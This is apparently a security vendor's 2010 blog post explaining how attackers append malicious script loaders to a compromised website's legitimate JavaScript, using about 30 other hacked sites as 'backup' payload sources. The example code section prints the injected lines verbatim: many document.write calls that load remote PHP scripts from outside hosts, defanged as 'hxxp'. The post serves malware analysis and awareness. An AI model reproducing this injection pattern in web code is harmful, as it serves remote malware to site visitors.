Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila – you have at your disposal a “trusted” website – lots of web surfers will drop by, and in turn get infected with the hacker’s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.

Overview

This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

An Example

Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03

In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

The “Backup” Strategy

Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

Frequency distribution of infected websites used in the transmission of malware.

Example Code

element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned.  For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
Position.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop  || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;

element = element.offsetParent;
} while (element);

return [valueL, valueT];
}
}
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
document.write('<script src=hxxp://devinjarvis.com/modlogan/index.php ></script>');
document.write('<script src=hxxp://forumonly5.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://precilub.com/lang/favicon.php ></script>');
document.write('<script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php ></script>');
document.write('<script src=hxxp://travelgenerators.com/Images/Dubai.php ></script>');
document.write('<script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');

Report, Security document.write, hackers, injection, malware, script